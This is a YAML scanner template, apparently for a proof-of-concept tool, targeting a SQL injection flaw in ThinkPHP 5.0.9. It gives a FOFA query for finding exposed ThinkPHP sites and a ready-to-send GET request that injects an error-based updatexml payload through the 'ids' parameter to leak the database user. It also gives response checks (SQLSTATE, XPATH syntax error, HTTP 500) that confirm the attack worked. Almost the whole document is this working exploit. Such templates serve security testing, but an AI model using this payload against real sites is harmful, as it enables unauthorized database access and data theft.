product: ThinkPHP
vName: ThinkPHP 5.0.9 ids SQL注入
type: SQL注入
vID: [ ]
level: 3
vDesc: ThinkPHP 5.0.9 includes verbose SQL error message that can reveal sensitive information including database credentials.
version: ''
note: ''
search:
  FOFA: app="ThinkPHP"
protocol: http
link: ''
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1
    verify:
      logic: and
      check:
        - body:
            value:
              - SQLSTATE
              - XPATH syntax error
            logic: and
        - status: 500